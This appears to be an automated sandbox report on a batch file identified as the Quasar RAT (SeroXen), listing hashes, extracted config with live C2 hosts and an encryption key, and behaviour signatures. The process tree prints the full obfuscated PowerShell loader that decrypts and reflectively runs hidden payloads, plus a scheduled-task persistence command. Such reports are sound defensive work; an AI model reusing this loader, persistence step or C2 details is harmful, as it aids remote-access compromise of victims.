Overview

overview

10

Static

static

1

Uni.bat

windows7-x64

8

Uni.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 10:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Uni.bat

  • Size

    511KB

  • MD5

    9fb9372aca1d8d842589419264c8ae62

  • SHA1

    9313414673f343c9bb14939c6c14697dcdfc1aa0

  • SHA256

    38defd519e3b007e7590a2dc8101f356806b1f1cdcdba3eccfa0afc46b2f8577

  • SHA512

    10b935a27946dd4e4ff22b42782e141d22471f90fe086c6874e783a341066f0b54be8fdcbc7c7df21d96565ed0d7b00afd91bd59ac8c37613579decb0fb84618

  • SSDEEP

    12288:/JXwTLWKJYuv1T5jgKND/v+Tz5Wgv2qwAbMdusp/cq:/JKj5jgKdW5WgOqwAYxh

Score
10/10
quasarseroxenexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

panel-slave.gl.at.ply.gg:57059

panel-slave.gl.at.ply.gg:27892
Mutex

$Sxr-rpL8EItHN3pqIQQVy2

Attributes
  • encryption_key

    PXEHWy52mqnqS2Hd39SK

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SeroXen

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tEGKi4VytwOkTEJ8mQKeyciBUGLe1meEjQfMLUYBak='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7rtamVIQAKNy+6k+WiT3+Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ukQvk=New-Object System.IO.MemoryStream(,$param_var); $BXroT=New-Object System.IO.MemoryStream; $hmuUD=New-Object System.IO.Compression.GZipStream($ukQvk, [IO.Compression.CompressionMode]::Decompress); $hmuUD.CopyTo($BXroT); $hmuUD.Dispose(); $ukQvk.Dispose(); $BXroT.Dispose(); $BXroT.ToArray();}function execute_function($param_var,$param2_var){ $ZKofb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $shval=$ZKofb.EntryPoint; $shval.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$imIdF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($mdSzT in $imIdF) { if ($mdSzT.StartsWith(':: ')) { $Ijxic=$mdSzT.Substring(3); break; }}$payloads_var=[string[]]$Ijxic.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:3568
      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3272

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ctdjn4y1.21b.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      Filesize

      423KB

      MD5

      c32ca4acfcc635ec1ea6ed8a34df5fac

      SHA1

      f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

      SHA256

      73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

      SHA512

      6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

      Download Submit
    • memory/1552-36-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/1552-56-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/1552-55-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/1552-53-0x0000000006EF0000-0x0000000006F66000-memory.dmp
      Filesize

      472KB

      Download
    • memory/1552-52-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/1552-51-0x0000000006D30000-0x0000000006D74000-memory.dmp
      Filesize

      272KB

      Download
    • memory/1552-38-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-1-0x0000000004A80000-0x0000000004AB6000-memory.dmp
      Filesize

      216KB

      Download
    • memory/4108-30-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-19-0x0000000006080000-0x00000000060CC000-memory.dmp
      Filesize

      304KB

      Download
    • memory/4108-20-0x0000000007720000-0x0000000007D9A000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/4108-21-0x00000000070D0000-0x00000000070EA000-memory.dmp
      Filesize

      104KB

      Download
    • memory/4108-27-0x0000000007490000-0x00000000074A2000-memory.dmp
      Filesize

      72KB

      Download
    • memory/4108-23-0x0000000007010000-0x0000000007072000-memory.dmp
      Filesize

      392KB

      Download
    • memory/4108-24-0x00000000071D0000-0x000000000723C000-memory.dmp
      Filesize

      432KB

      Download
    • memory/4108-3-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-2-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-22-0x0000000000FB0000-0x0000000000FB8000-memory.dmp
      Filesize

      32KB

      Download
    • memory/4108-28-0x0000000009DE0000-0x0000000009E1C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/4108-29-0x0000000074F5E000-0x0000000074F5F000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4108-18-0x0000000005F40000-0x0000000005F5E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/4108-31-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-0-0x0000000074F5E000-0x0000000074F5F000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4108-13-0x0000000005A30000-0x0000000005D84000-memory.dmp
      Filesize

      3.3MB

      Download
    • memory/4108-37-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-26-0x0000000007330000-0x00000000073C2000-memory.dmp
      Filesize

      584KB

      Download
    • memory/4108-50-0x0000000074F50000-0x0000000075700000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4108-7-0x0000000005940000-0x00000000059A6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/4108-6-0x0000000005860000-0x00000000058C6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/4108-5-0x00000000051F0000-0x0000000005212000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4108-25-0x000000000A350000-0x000000000A8F4000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/4108-4-0x0000000005230000-0x0000000005858000-memory.dmp
      Filesize

      6.2MB

      Download